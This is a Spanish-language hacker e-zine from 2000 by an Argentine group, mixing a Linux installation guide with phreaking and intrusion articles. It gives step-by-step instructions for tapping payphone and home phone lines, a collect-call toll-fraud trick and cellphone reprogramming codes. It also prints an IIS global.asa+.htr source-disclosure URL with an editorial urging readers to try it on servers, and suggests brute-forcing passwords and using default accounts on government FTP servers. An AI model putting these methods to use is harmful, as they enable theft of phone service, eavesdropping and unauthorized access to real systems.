



     			            D   A   T   A    C   O   D   E 
                                    
 
                                         ARGENTINA


                         E-ZINE TECNICO DE SWEET_DEVILS HACK TEAM




  *****************************
  * Numero: 2                 *
  * A¤o: 1                    *
  * Fecha de edicion:07/08/00 *
  *****************************








                      *************************************************
                      *************************************************
                      ******************* EDITORIAL *******************
                      *************************************************
                      *************************************************
                      *************************************************



  Hola a todos, espero que la espera por este segundo numero no haya sido muy larga, la verdad es que en estos 4 meses tuvimos los mil y un problemas, por lo que se nos dilato la entrega del segundo numero.
Pero gracias a Dios no son todas malas en nuestra cibervida, ya tenemos nuestro dominio andando y estamos preparando todo para una mudanza a un servidor propio, donde ya podremos dilatarnos como se nos ocurra!!! ;o)

Ademas no estaria mal contarles que comenzamos con la venta de cds con aplicaciones y versiones de Linux, los precios son de 6$ si te llevamos a tu casa y 4$ si lo venis a buscar.
De esta forma estamos haciendo dos cosas, colaborando para  el mantenimiento de la web y ayudando a la causa GNU/LINUX.
Por el momento solo es posible para Capital Federal, Cordoba y La Rioja.

Pasa y mira las versiones que tenemos, las aplicaciones y todo el resto!!!

Por ultimo, en este numero tratamos de ponernos al dia con todo lo que tenemos, alguna cosas nos quedaron colgadas, asi que por favor perdon si falta algo. 

Espero que lo disfruten.


DATACODE la publiacion Argentina para el mundo.


centros de distribucion donde esta nuestro ezine:



                              Http://www.sweetdevils.com.ar

                              Http://www.hackersarg.com.ar

                              Http://www.zine-store.com.ar

                              Http://www.puntokom.com.ar

Gracias a:

*Lorenzz* por la ayuda en la distribucion de la ezine y el articulo anterior.

*Alexter* por la ayuda desinteresada y el tiempo dedicado.

*Puntokom* Por ayudarnos a crecer, una gran ezine Argentina!!

*MAU* Por distribuirnos.


Muchas gracias... 


 									
								Bactery
					              bactery@mixmail.com



TODOS LOS COMENTARIOS GENERALES POR FAVOR A: 


		                                  SWEET_DEVILS@MIXMAIL.COM
 


                                                                         
                                                                   



    ******************************************************************

IMPORTATE: 
           NINGUNO DE LOS ESCRITORES, EDITORES NI MIEMBROS DE ESTA REVISTA SE HACE RESPONSABLE POR EL MAL USO QUE LE PUEDAS DAR HA LO AQUI EXPUESTO, ESTO ES SOLO PARA TU EDUCACION Y NO HACEMOS APOLOGIA DE NINGUN TIPO. HACK ETICO BABY... ;o)    
 
    ******************************************************************





                                            
                         				            		 							            *************************************************
			*************************************************
			*********************INDICE**********************
			*************************************************                     
                  *************************************************


    -----------------------------------------------------------------------

	  
      I--<0>   EDITORIAL ------------------------>   SWEET DEVILS 		     					   (sweet_devils@mixmail.com)  
   

      I--<1>   Phreaking ------------------------>     Alexter 
      							(alexter1@hotmail.com)  
   
   
      I--<2>   Celulares ------------------------>     Alexter 
      							(alexter1@hotmail.com)  
   
   
      I--<3>   Linux Conectiva ------------------>     JoShO
 						              (jaque@uol.com.ar)    
   
   
      I--<4>   Bug del mes ---------------------->    Editorial
							      (sweet_devils@mixmail.com)  


      I--<5>   Ftp basico desde linux ----------->    Bactery 
			           	 		      (Bactery@mixmail.com)    
  

      I--<6>   Hack desde windows --------------->     Lynx 
						           (the_lynx@mixmail.com)  
 

      I--<7>   Introduccion al telnet ---------->     K0P1K47 
				           	           (k0p1k4t@usa.com)     


      I--<8>   IRC ------------------------------>     TOTO
						           (el_tomy@hotmail.com)


      I--<9>   Recomendamos --------------------->    Editorial  
			             		     (sweet_devils@mixmail.com) 	 
      

      I--<10>  DESPEDIDA ------------------------>  SWEET_DEVILS          			 			                             (sweet_devils@mixmail.com) 

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++










                     *************************************************
  			   ****************P H R E A K I N G ***************
    			   *************************************************
         		   ****************Por A L E X T E R**************** 
                     *************************************************



INTRODUCCION AL PHREAKING

Hola a todos (+les suena conocido esto?), pues empezamos en este articulo con un poco de telefonia +les parece?, bueno si no les parece lean igual porque uno no sabe cuando le va a servir. 

Despues de hablar rato con mi ciberamigo Bactery, este me convencio de escribir estos articulos para introducirlos en el mundo telefonico. Lo primero es describir un poco como funciona todo esto. 

Para enlazar una PC con otra se necesita disponer un hardware llamado "modem", este periferico hace la transformacion de ondas en dos partes, la parte "Moduladora" donde se convierte los pulsos electricos (ondas digitales) de nuestra PC en ondas senoidales (ondas analogicas) que viajan a traves de los cables de telefono. Cuando esta se¤al llega a destino otro modem hace el trabajo inverso, o sea "DEModula" la se¤al de analogica a digital. 

Claro que para que esto se produzca es necesario contar con una sencilla linea de telefono, y por supuesto una media cantidad de dinero para pagar la llamada, la pregunta es: y si no dispongo de de lo primero o peor aun de lo segundo?.
Take easy men, aqui un estupido (pero efectivo) truquillo para conectarse a la red facil y economicamente ;o) 

1- El truco de la cabina 

Existen dos tipo de cabinas telefonicas, las publicas y las semi-publicas. Si seguimos las siguientes reglas podremos actuar en cualquiera de ellas. 


a) La cabina tiene que estar un poco oculta a la vista general. 

b) Solo utilizarla en horario bien nocturnos. 

c) Nunca, pero nunca golpear la cabina. Estas poseen un modem propio que alerta de cualquier fraude a la guardia del 114. Si no me creen hagan la prueba y fijense que dice en el visor "Aguarde un momento....." y mientras vos aguardas la guardia viene en camino. 

d) Llevar siempre un kit de herramientas basico como el siguiente: Una linterna peque¤a, minimo dos destornilladores, uno plano comun y otro phillips o estrella, cinta macgyver o plastica, un cutter y la inseparable cajita adaptachorra que explico a continuacion. 


Cajita adaptachorra:

Ingredientes: 
1 caja de conexion telefonica tipo americana. ($3)
2 cables comunes de 1,5 mt. c/u (mas o menos). ($0,50)
2 pinzas cocodrilos chicas, roja y negra. ($0,60)
1 cable con dos fichas RJ11 (el cable que entra en el telefono). 

Este cable viene cuando compras un modem, es generalmente de color gris.

Preparacion: 

Abrir con el destornillador la caja americana, veras dos o cuatro tornillos con cables de distintos colores. Mira la caja desde el lado contrario a la conexion del RJ11, uni un cable comun que conseguiste con el tornillo de la conexion verde. Del otro lado del cable unilo con el cocodrilo de color negro. Hace lo mismo con el otro cable o sea uni el tornillo rojo al cable y este al cocodrilo rojo. si existen mas tornillos no te preocupes, dejalos sin unir. Cerra la caja y ahora veamos como usarla. 

Y para los mas chiquitos los cuentos del tio Alexter.

Hoy "Pascual el phreak" 

"Erase una vez un pais donde una bruja y un brujo malvados aterrorizaban a toda la region, ellos eran Telefonina y Telecomoteivas, creian que eran invulnerables, pero el pueblo asolado por estos malvados hermanos, busco un heroe, alguien que les hiciera frente sin temerle a sus caros y malos servicios. He aqui que surgio un hombre llamado Capitan Pascual, terror de ni¤as y telefonia celular. 
Un heroe de cables y huesos, que se dispuso a dar guerra con tono y pulso a los brujos de esta ciudad. Una noche, cuando los guardias dormian, cargo su mochila llenas de armas que el mismo habia fabricado y tomo por asalto una hermosa cabina telepotica sin que lo observara nadie en la oscuridad. 
Lo primero que hizo fue buscar por detras de la cabina un cable negro que transportaba los valiosos datos, con su cutter hizo dos cortes laterales a cada uno de los cables, por la parte de atras de los mismos con diferencias de 10cm cada corte, tomo la precaucion de no cortar completamente los cables para no alertar a Telefonina y poder utilizarlos de en vez en cuando. 
Agarro un peque¤o amigo llamado Coco el Drilo y le dijo que sujetara fuertemente uno de los cables, hizo lo mismo con otro coco al otro cable. Pascual sabia que tenia que actuar rapidamente, asi conecto a la cajilla de donde salian los cocos a un cable que iban directamente a una peque¤a caja con dos tapas donde guardaba sus recuerdos, promesas e inquietudes y se prometio que en cuestion de minutos mandaria a sus amigos de las tierras lejanas mensajes de sabiduria y amistad. 
Como medida de precaucion solo se conecto en intervalos de menos de 30 minutos, para despistar a cualquier soldado de Telefonina. Nunca levanto el tubo de la cabina, estos bichos eran inteligentes y si lo hacia desconectaba todo hasta que estas se dormian. Nunca trato de tocar los cables con sus manos, estos en momentos de llamado levantaban tensiones de 70 volts, peligrosa para cualquier heroe. 
No solamente lo hizo con cabinas, sino se corrio la voz que se lo veia en los tejados, buscando cables de ingenuos, para hacerles el mismo procedimiento, teniendo la precaucion que los ingenuos estuvieran dormidos y que sus bocinas parlantes fuesen digitales, nunca viejas bocinas analogicas a disco, ya que estas hacian ruido al usarlas" 
Y este cuentito termina aqui, cualquier semejanza con la realidad es pura coincidencia.  


								Alexter.
							 alexter1@hotmail.com

(Este articulo fue escrito con una Palmtop Pc HP 360LX)






                     *************************************************
  			   *************P H R E A K I N G 2da PARTE*********
    			   *************************************************
         		   ****************Por A L E X T E R**************** 
                     *************************************************






SEGUNDA PARTE

(¨como es eso que las segundas partes no son buenas?)

Hola de nuevo ciberamigotes...., volvemos a la carga con algo mas sobre telefonos, (eso que le llaman Phreaking). Hoy nos deleitamos con un viejo truco de como realizar peque¤as llamadas GRATIS!!!. Tambien veremos que hay dos secciones, una de fonos comunes y otra de celulares (Dios me bendiga y las telefonicas me perdonen!!!).

Trucos:
Este truco lo venimos realizando desde hace tiempo con un amigo, es totalmente inofensivo, sencillo y gratis. Se trata del viejo truco de la llamada a cobrar (claro que el unico que la paga es la telefonica). Solo hay que ir a un telefono publico (ojo no anda con semipublicos) marcar el nro 19, y la operadora automatica contestara "Bienvenido al servicio de cobro revertido de .....(censurado por garkas)... marque el numero a llamar" o algo parecido.
Bueno en ese momento llamamos al nro del tia Josefina que vive en Pelotilleu, y escucharemos la maquina que nos dice "Diga el nombre de la persona a contactar.."
En ese momento solo tenemos 7 segundos para decir cualquier boludez, por ejemplo "Tia, llego tarde, dejame cena".
Claro que la tia no debe aceptar la llamada, con el mensaje basta.
Este truco es bien pelotudo pero funciona, y los puede hacer zafar de en vez en cuando. Claro que los 7 seg. no bastan pero ¨y si lo hacemos varias veces?, no se, las posibilidades imagineselas ustedes.

Moviles:
En esta ocasion vamos a ver como reprogramar los telefonos celulares, yo le voy a brindar los codigos y les dejo que hagan ustedes lo que quieran (tengan cuidado con lo que hacen porque les pueden dar de baja si se mandan una macana, acuerdense de que "El gran hermano nos vigila").
Aqui  van los codigos:

Nokia 918 (un fierro):

1- Digita *3001#12345 OK
2- Pulsa la tecla abajo \/
3- Te muestra algo asi: 111#*111#2*1234  (el grupo de nros 111 pertenece a la campa¤ia en donde estes, el 2 es el idioma y el 1234 es el password)
­que tal, lindo bicho no!
Otro:
1- Ingresa a la programacion y ponete en el menu 2.
2- Pulsa ABC y coloca un mensaje de entrada.
3- Apagalo y prendelo nuevamente

Los demas se los dejo para que experimenten.....enjoy!!!!

Phillips ISIS

1- Apaga y prende el celu, mientras muestra la presentacion mantene presionada la tecla 4, el display debe mostrar despues - - - -
2- Digita 6267, el menu tiene 66 opciones (33 para cada nam), estos son los codigos.
1-nro telefono
2-Sistema de Identificacion SID
3-Nro de emergencia
4-Sistema A o B de red
5-Nuestro nro de fono
6-Canal de control 1
7-Pagina del canal
8-Este es bueno, Icono de marcado: 1 es +, 2 es envolvente, 3 es una carita.
10-  ....ufff me canse, no esperaba que yo les diera todo servido no? Busquen ustedes. Una recomendacion, anoten todos los codigos antes de cambiarlos, por las dudas digo.....Para salir apaguen y vuelvan a prenderlo.

Motorola DPC 550 (y similares analogicos)

1- Presiona PWR on, luego FCN y digita 0 000000 000000 (13 ceros), luego RCL
2- Pulsa <*, te muestra 00000 es el carrier. segui presionando <*.
3- ... me canse, si desean mas informacion me mandan un e-mail:

...este es para vos Bactery....

Ericsson 788

1- Para entrar en la programacion digita el nro 923885, depues pulsa la flecha de la derecha.
2- En el menu busca las diferentes opciones, por ejemplo donde diga UNIFON o CTI y cambialo por lo que quieras.

Bueno esto a sido todo, nos vemos en la proxima...
Alexter
PD: Si alguien desea intercambiar info conmigo escriban, generalmente uso clave PGP para tratar algunos temas... 


chau!!!
Aguanten los sweet !!!!!


					
						 		Alexter
						       alexter1@hotmail.com






                    *************************************************
                    *********Instalacion Linux Conectiva 4***********
                    *************************************************
                    *******************Por JoShO*********************
                    *************************************************



INICIO
******

	
	Bueno para empezar, Hola! soy JoShO y este es mi primer articulo en la e-zine... pero  dejemos de bla, bla y empecemos..

	Lo primero que tienen que hacer es fijarse si tienen espacio libre en el disco (1 Gb es suficiente, pero mejor si son 2 como para mudarse de win a linux), si tienen el espacio recomendable pero lo esta utilizando todo windows, no se hagan problema ya que los CDs de Linux traen en la carpeta "dosutils" una aplicacion llamada FIPS que sirve para reparticionar el disco sin eliminar nada.. (ahora si! para reparticionar el disco es recomendable desfragmentarlo). Bue se estaran preguntando "y ahora como carajo le hago", pues simple tienen que copiar la carpeta de FIPS al disco duro, luego reseteen la maquina y entre en "modo DOS".. y bue desde ahi entren a la carpeta de FIPS y ejecuten el programa. Una ves en marcha el programa les ira haciendo todo un cuestionario, hasta terminar! (el programa esta en ingles, pero es facil de manejarlo).	

	Bueno una ves reparticionado el disco con el FIPS, si ven en el explorador o en alguna otro programa, veran que hay dos particiones, la ultima (osea la nueva) no esta formateada.

	
CREANDO UN DISCO DE ARRANQUE (por si no pueden bootear desde el CD)
**************************

1Ý paso: Inserten el CD de conectiva

2Ý paso: Abran una ventana DOS

3Ý paso: Vallan a la unidad del CD, y luego a la carpeta dosutils

4Ý paso: Bueno en este paso utilizaremos la aplicacion rawrite que sirve para crear discos de arranque en MS DOS, esta aplicacion viene incluida en el CD de Conectiva. Ahora para empezar tecleen rawrite, y  les dira "Enter disk image source file name:", bueno escriban X:\imagens\boot.img (reemplacen la X por la letra de la unidad del CD) y presionen enter!. Lo siguiente que les aparecera es "Enter target diskette drive:", ahi escriban la unidad del diskette y listoo... ahora esperen un poco y tendran su disco de arranque listo!


EMPEZANDO LA INSTALACION!
*************************

	Reinicien la PC con el disco de arranque (ya saben..por si no pueden bootear desde el CD) o con el CD a dentro.. ahora les aparecera un cuadro explicando un monton de cosas.. y abajo dira "boot:" ahi presionen enter para continuar con la Instalacion!

1Ý CUADRO: Aqui el programa de instalacion les pedira que elijan un idioma.. (creo que elegiras espa¤ol!).

2Ý CUADRO: En este cuadro les pedira que elijan un teclado (aqui no ahi mucho para explicar)

3Ý CUADRO: Ahora el programa probara el sistema para determinar si se requiere el soporte a PCMCIA. Antes de seguir dare el significado de PCMCIA.

PCMCIA: Acronimo para Asociacion Internacional de Tarjetas de Memoria de Computadoras. Esta organizacion produce patrones fisicos, electricos y de software, para peque¤os dispositivos, del tama¤o de tarjetas de credito que pueden contener memoria, modems, adaptadores de red, y mas. Tambien se conocen como PC Cards, estos dispositivos se usan principalmente en las Notbooks, por su tama¤o.
 
Bue sigamos!. En el caso de que encuentre una controladora PCMCIA, el sistema preguntara si hace falta el soporte a PCMCIA durante la instalacion. Ahi podes responder SI o NO, ya que de todos modos si es que queres lo podrias configurar despues de la Instalacion.

4Ý CUADRO: Tienen que elegir el metodo de instalacion, hay 5 posibles metodos.. para elegir: 

* CDROM local
* Imagen NFS
* Disco Duro
* FTP
* HTTP

 Como nosotros tenemos en CD, elijamos el primero! (CDROM local)

5Ý CUADRO: Aqui el programa de instalacion solicitara la insercion del CD de Conectiva en la Unidad... Despues de eso el programa de instalacion probara el sistema local e intentara identificar la Unidad! Iniciara la búsqueda a partir de un dispositivo IDE, si la encuentra el programa de instalacion continuara normalmente, pero si no encuentra la unidad de CD, te pedira que indiques el tipo de Unidad, se puede elegir entre SCSI y OTROS... (bueno hasta aqui llegue)

6Ý CUADRO: Este da a elegir entre INSTALAR o ACTUALIZAR

INSTALAR: por si es primera ves que lo vas a hacer o si quieres instalarlo sobre otras instalaciones de linux

ACTUALIZAR: este actualiza versiones anteriores de RedHat y Conectiva


	Si todavia me sigues, elige instalar!


7Ý CUADRO: Da a elegir la clase de instalacion, que puede ser entre: 

* Estacion de Trabajo (esta opcion remueve todas las particiones linux)
* Servidor (esta te remueve todo!)
* Personalizada (aqui podes controlar todo ;))

Pues elige la "Personalizada"

8Ý CUADRO: Ah llegado la hora de crear particiones para conectiva! jeje aca podes hacer moco!..

Bueno para crear las particiones linux tenes que elegir entre las 2 herramientas: DISK DRUID o FDISK (el famoso fdisk para linux)


Pues yo te diria que elijas el DISK DRUID! ya que es mas facil de manejarlo! 


9Ý CUADRO: Este cuadro pertenece al programa  DISK DRUID!. Bue una ves iniciado el DISK DRUID, les mostrara informacion sobre las particiones actuales (osea las particiones existentes) y un resumen sobre los Drivers (cada linea en esta parte representa un disco duro en el sistema). Tambien les mostrara varios botones:

Adicione: Crea una nueva particion.

Edite: Se utiliza para cambiar atributos de la particion actual (osea de la que esta seleccionada en ese momento)

Suprima: Este boton sirve para borrar la particion que esta selecciona, si hacen click aqui les aparecera un cuadro de dialogo preguntandoles si desean eliminar esa particion o no.

Ok: Graba todos los cambios.

Anterior: Bue si hacen click aqui se van para atras! jeje! 

Bueno ya les explique que significa cada boton, ahora a crear de una ves por todas las particiones necesarias para instalar Linux. 
Bue para crear la particion hace click en Adiciona, y luego te aparecera un cuadro que te pedira que ingreses:

Punto de Montaje: Aqui tenes que poner el punto de montaje de la particion. Por ejemplo, si la particion va a ser, la particion raiz pulsa /, o teclea /home para la particion home. 

***********************************************************************************************
AVISO: pon solamente /, asi te cree una raiz, y linux luego distribuir el espacio total de esa particion para las demas que seran creadas automaticamente. 
***********************************************************************************************

Tama¤o: Aqui tienes que ingresar el tama¤o en Mb. para la particion.

Grow to fill disk: Verifica si el tama¤o introducido en el campo anterior es el tama¤o exacto de la particion, o su tama¤o minimo. Para seleccionar esta opcion pulsa la barra espaciadora. Al seleccionar esta opcion la particion podra crecer hasta rellenar todo el espacio disponible en el disco duro. En este caso el tama¤o de la particion crecera o disminuira, a medida que otras particiones se modifiquen.

Tipo: Aqui te muestra una lista de diferentes tipos de particion. (Swap, nativa, Dos)

Allowable Drivers: Aqui se mostrara una lista con todos los discos instalados en el sistema, si algunos de ellos no se seleccionan, no se podra crear la particion en ese disco duro. (Por lo tanto seleccionen solamente el disco que van a utilizar)

Ok: Bue este boton es para aceptar (osea que crea la particion)

Cancelar: Ya sabes! cancela lo que ibas a hacer..

Bueno ahi ta todo! ahora lo que tenes que hacer sabiendo todo esto, es crear una particion de tipo Nativa y una Swap. A la Nativa le pones punto de montaje / (para que sea raiz), el tama¤o depende del espacio libre que tengas en el momento y del total memoria RAM,  por ejemplo si en total tenes 1500 Mb. y tenes 32Mb. de Memoria, le pones 1436 para tener espacio para crear la Swap. El tama¤o del tipo de particion Swap es recomendable que sea el doble de la memoria RAM, es por eso que deje un espacio de 64Mb. (es el doble de 32). Bue se preguntaran que carajos es Swap, bue es un espacio de intercambio osea es memoria virtual.

Bueno creo que ya saben como crear las particiones: Nativa y Swap 

Una ves creadas esas particiones hagan click en OK! para que guarde todos los cambios y siga con el otro cuadro.

10Ý CUADRO: ahora el programa de instalacion busca el area de cambio (swap).. Cuando la encuentre seleccionala y presiona OK!!! (tambien podrias seleccionar la verificacion de errores)


11Ý CUADRO: aqui tendras que elegir las particiones a formatear, selecciona la que pusiste como nativa!


12Ý CUADRO: Hay por fin llegamos a una parte entretenida! ;)... ahora estamos en la seleccion de paquetes a instalar!

Bueno elige los que tu quieras! y luego selecciona la opcion seleccionar paquetes individualmente, y elige OK!!

13Ý CUADRO: Bueno esto es para sacar o agregar aplicaciones, de los paquetes anteriormente seleccionados!
 
Lo que podrias sacar son los juegos, ya que ocupan espacio al pedo!

Una vez hecho esto! hace click en hecho, para continuar!


En este momento capaz que te diga que necesita instalar otros paquetes para que funcionen bien los paquetes que nosotros seleccionamos, pues dile que SI!

 				--------0-------
 BUENO AHORA LO QUE TENEMOS QUE HACER ES ESPERAR A QUE SE INSTALEN TODOS LOS PAQUETES.. PARA PODER SEGUIR CON LOS ULTIMOS PASOS DE LA INSTALACION.. 

 MIENTRAS TANTO PODRIAN IR A TOMAR ALGO, O COMER, O HABLAR POR TEL CON LA NOVIAAA...  QUE SE YO LO QUE PUEDEN HACERRR... LO QUE SE ES QUE TIENEN QUE HACER ALGO PORQUE ES MEDIO ABURRIDO ESTAR VIENDO LA PANTALLA COMO BOLUDO DURANTE MEDIA HORA!
				--------0-------

	Hey bueno ya termino de instalar los paquetes, ahora quedan unos últimos pasos:

1Ý: Configurar un raton! (bueno aqui elegi el raton que tengas!)

2Ý: Aqui te pregunta si queres configurar una red LAN.. bueno me imagino que no tenes, pero si tenes decile que si... Pero este paso de la LAN no lo explicare, si deseas saber como instalar una red LAN puedes ver el articulo que esta publicado en Nuestra Web. 

3Ý: Bueno ahora me imagino que estan en configuracion horaria..! Aqui tenes que elegir la zona horaria.

4Ý: Aqui te aparecera un cuadro, mostrando los servicios iniciados automaticamente, por supuesto estan marcados por defecto los servicios indispensables. Eso no quiere decir que no podas seleccionar mas. 

5Ý: En esta parte podes configurar una impresora.. Te recomiendo que la configures despues, osea en el X-windows..

6Ý: Hora de ingresar la clave del super usuario (root)

7Ý: Despues de que ingresas la clave del super usuario, como vimos anteriormente.. Te preguntara si quieres crear un disco de arranque.. pues dile que si! y sigue esos peque¤os pasos...

8Ý: Ahora te pregunta a donde quieres que ponga el lilo.. bueno te recomiendo que no lo pongas en el MBR! ya que si lo pones ahi sera el primer sistema en ejecutarse..

 Lo que puedes hacer es elegir la opcion instalar en "el primer sector de la particion de arranque", esto hara que lo ponga en el primer sector de arranque de la particion de linux.

 Y sino podrias poner ignorar o ignore (es lo mismo! pero en distinto idioma), esto hara que ponga el lilo en el diskette y para iniciar el sistema (linux) tendrias que ingresar el disco de arranque..

9Ý: Y por ultimo viene la configuracion de X-Windows! 

Y eso es TODO!!!

Despues te dara una despedida!! Y ya esta!!! 


BUENO CREO QUE YA TERMINE! ME DESPIDO DE USTEDES! 

CHAU! 

Y ESPERO QUE ESTO LES SIRVA DE ALGO...
		
Como mensualmente iremos viendo la forma de instalar las distribuciones mas conocidas de linux puedes darte una vuelta por nuestro shoping y conseguirlas a 6$ si te la llevamos  y 4$ si la venis a buscar. (solo para Capital Federal, Cordoba, La Rioja y San Juan.). 



											

									JoShO  
	               				       joshack@yupi.com








                      *************************************************
                      ******************Bug del mes********************
                      *************************************************
                      ***************** Por Editorial ***************** 
                      *************************************************


 
Los ficheros del servidor web al descubierto con IIS
****************************************************


 Una vez mas los archivos del servidor web de Microsoft pueden ver su codigo descubierto mediante una sencilla modificacion de la url. Según ha comprobado Hispasec a lo largo del dia son múltiples los servidores afectados que dejan al descubierto la seguridad de su sitio web. 
Este problema puede poner al descubierto las passwords de las bases de datos, passwords administrativas, y detalles del funcionamiento del servidor web o de la logica de negocio del sitio. Para explotar la vulnerabilidad bastara con solicitar un nombre de archivo existente, por ejemplo global.asa seguido de el caracter + y la extension ".htr".

De esta forma, cuando se encuentra un "+" en el nombre de archivo, ISM.DLL truncara el "+.htr" y abre el archivo solicitado. Si dicho archivo no es un .htr parte del codigo fuente quedara expuesto al atacante. Por ello, el intruso podra recuperar el contenido de archivos como el global.asa que contienen a menudo informacion sensible como el nombre de usuario y password del servidor SQL.

El ataque es tan sencillo como construir la url de la siguiente forma:

http://www.servidor.afectado.com/global.asa+.htr

El ataque no permitira modificar datos de las paginas, pero si acceder a informacion sensible que permita desarrollar otro tipo de ataques. Microsoft ha publicado los parches necesarios para cubrir esta vulnerabilidad, cuya instalacion recomendamos a todos los administradores de Internet Information Server 4 o 5. Otra solucion posible es desactivar el soporte de archivos .htr.

Mas informacion:

Boletin de seguridad de Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS00-044.asp

Preguntas y Respuestas de Microsoft sobre la vulnerabilidad:
http://www.microsoft.com/technet/security/bulletin/fq00-044.asp

Parches para IIS 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22709

Parches para IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22708


Tomado de hispasec.

(Nota: Este bug lo publicamos para todos los nuevitos, porque es un hack desde navegador por lo que no cuesta nada probarlo!!!, yo lo he hecho y me funciono en 3 de 10 servers, por lo que manos a la obra!!!) 
 






                *******************************************************
                *****************Ftp basico desde Linux****************        	          *******************************************************           		    **********************por Bactery********************** 
                *******************************************************



Este protocolo se utiliza para la tranferencia de archivos entre computadoras conectas a internet. Cuando te conectas a una maquina por medio de este sistema podes moverte por la estructura de directorio, subir y bajar archivos. Siempre y cuando seas un usuario admitido ;O).

su uso es sencillo, solo tienen que teclear ftp desde la linea de comandos de tu linux y instantaneamente estaras conectado al uso de ftp pero no todabia a tu objetivo. Ahora seria prudente hacer un help para ver las opciones que tenemos:


*open + ip: habre la direccion requerida.
(recuerda que para obtener la ip de la maquina a la que quieren hacer ftp, puedes hacerlo utilizando el comando <ping + dominio>)

*close o disconect: sierra el host remoto.

*put + archivo: transfiere un archivo desde la maquina local a la maquina remota.

*get + archivo: tranfiere los archivos al reves, osea desde la maquina remota a la tuya.

*mget + archivos: transfiere varios archivos.

*mput + archivos: inverso a lo anterior.

ls: igual al dir de DOS.

!+comando: ejecuta el comando en la maquina local.


Obviamente el numero de opciones es mayor pero para que te muevas por primera vez no esta de mal, ademas como ya dije con poner help tenes todas las opciones.

La cuenta:
**********

Mas de una vez seguramente te pasara que no eres un usuario registrado en un sistema, por lo que a menos que conozcamos la cuenta de otra persona nos quedan 3 alternativas:

1ro- Entra a la red como anonymous, lo cual es recomendable en primera instancia, ya que te daras cuanta de la calidad de la seguridad del server, si podes hacer algo como anonymous, estas de suerte!!!! Para esto solo tenes que poner: anonymous cuando te pide el usuario y escribir tu mail cuando te pide el password. (nota: ni se te ocurra por tu mail real!!!!)

2do- No seria mala idea correr un crackeador de fuerza bruta al server para ver si tiene algun password flojo, osea si tiene un usuario pepe que utiliza pepe de password puede ser que caiga. Hay de todo en la gran viña de mi Dios!!! ;O)

3ro- Todo sistema cuando se instala crea cuantas por defecto, osea que el propietario no tiene la minima idea de que existen. Los server oficiales, me refiero a los gov.ar, edu.ar, mil.ar. Son generalmente manejados por gente que no tiene demasiado interes en su seguridad, por lo que ni chequeen estas cuantas (y si señores me ha pasado!!! no podes tenes la cuenta ftp:ftp con privilegios de usuario interno www.smandes.gov.ar!!!) por lo que no seria mala idea averiguar el site que corre tu victima y luego ver las cuantas defecto que trae.

Recuerda que aqui solo sirve inventar!!

Final
*****

Me olvidaba de decirles que ftp trabaja por medio del puerto 21 por lo que cuando hagan un port scan a un sitio y este de que lo tiene abierto ya pueden empezar a probar, existen en tu sistema linux algunos usuarios que no pueden acceder por este medio a tu maquina, se encuentran en /etc/ftpusers asi que date una vuelta y mira cuales siguen y cuales no.

Nada mejor para que pruebes lo que es en si tenes un sistema via ftp:

SISTEMAS: 

*disco.labs.pulltheplug.com (209.9.44.209) Cisco 2514 - IOS 12.0.4 - Firewall IOS - l: letmein 

*roothat.labs.pulltheplug.com (209.9.44.210) Pent. Pro - RedHat 6.2 

*bigperm.labs.pulltheplug.com (209.9.44.212) Pent. Pro - Debian/GNU Linux 2.1- l/p : guest/guest 

*bassd.labs.pulltheplug.com (209.9.44.211) Pentium - FreeBSD 4.0 - l/p : guest/guest 

*generic.labs.pulltheplug.com (209.9.44.213) Pentium - OpenBSD 2.6 - l/p : guest/guest 

*bricklouse.labs.pulltheplug.com (209.9.44.214) Pentium -NetBSD 1.4.2/i386 - l/p : guest/guest 

*mainsource.labs.pulltheplug.com (209.9.44.215) P2 Celeron - Suse Linux 6.4 - l/p : guest/guest 


Todas estas estaciones de trabajo permiten el acceso FTP y que adentro puedas curiosear un poco, tenes bastantes permisos como para que aprendas. Suerte!!!
Si te interesa saber bien sobre esto en nuestra web buscalo como WARGAMES.


Perdon por escrbir solo esto pero que ando medio ajustado de tiempo, prometo para la proxima algo mejor.


Espero que sea util.

								 Bactery
				 		         bactery@mixmail.com



Cuando me dio el poder de apreder me dijo "aprende", y asi lo hice... y asi poco a poco vi caer a mis enemigos, sin defensa... sin posibilidades.








                        										         *******************************************************
               ******************Hacking desde Windows****************
               *******************************************************           		   ************************Por L¥NX*********************** 
               *******************************************************




 ****** HACKING BASICO EN WINDOWS 95/98 ****** 


  Bueno, antes que nada me presento mi nombre es L¥NX, los que siguen las ediciones de Datacode    se daran cuenta de que no estuve en el numero anterior por causas que no vienen al tema, pero    prometo estar en las demas, compartiendo todos mis conocimentos.
  Muchos pensaran que este articulo no tiene sentido para un hacker, ya que un verdadero hacker    usaria unix o linux....y estoy de acuerdo, pero este articulo esta destinado a los que recien    estan empezando a relacionarse con el tema, o simplemente no quieren usar o aprender a usar unix o linux (!!GRAVE ERROR!!).
  Bueno, sin mas vueltas vamos a lo nuestro.


  ** Descripcion General De Windows**
  ===================================

  Como todos sabemos el windows95/98 es un popular sistema operativo de la
  casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy
  sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad 
  e inestabilidad en casi todos sus aspectos, ademas no ofrece tanta versativilidad 
  como otros sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la 
  cual es virtual y no real, si queres hacer la prueba ejecuta el defrag y
  ejecuta otro programa y veras esa famosa Multitarea.

  El win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo
  para la gente que busca facilidad, pero no nos engañemos pensando que es un
  sistema ideal para Internet, puede que para un usuario convencional le sea
  estupendo pero para un Hacker se queda muy corto, ya que le falta
  muchos servicios que otros sistemas operativos si traen como el ya
  famoso unix o sus derivados, como lo es linux.



 *. Seguridad En Windows.
 =========================

  Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no
  tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas
  que nos piden un password las podemos cerrar pulsando sobre la X o tambien
  nos basta con pulsar ctrl+atl+supr, con lo que nos salteremos esta ventana
  sin meter ningun password. 

  Por eso para que nuestro win95/98  sea un poco mas seguro de lo que no es,
  tendremos que instalarle algun paquete de seguridad disponible por la red,
  que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque
  siempre puedes comprar algun paquete comercial de seguridad, en mi opinion
  alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y
  cuando llega la oportunidad de demostrar su calidad nos falla, ya que no
  hay nada seguro 100%.

